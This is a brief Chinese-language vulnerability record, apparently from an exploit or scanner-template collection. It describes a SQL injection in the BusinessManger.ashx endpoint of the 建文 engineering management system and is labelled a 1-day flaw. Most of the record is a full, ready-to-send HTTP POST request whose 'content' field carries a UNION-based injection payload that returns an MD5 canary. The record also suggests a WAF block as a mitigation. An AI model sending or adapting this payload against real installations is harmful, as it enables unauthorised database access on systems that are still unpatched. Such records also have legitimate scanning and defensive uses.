vendor = "建文"
name = "建文工程管理系统BusinessManger.ashx存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/AppInterface/Business/BusinessManger.ashx"
detail = "POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 method=PrjType&content=%' and 1=2 union select 1,(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32));-- a"
fix = "WAF封禁路路径，等待发布补丁"
date = "0725"
label = "1day"
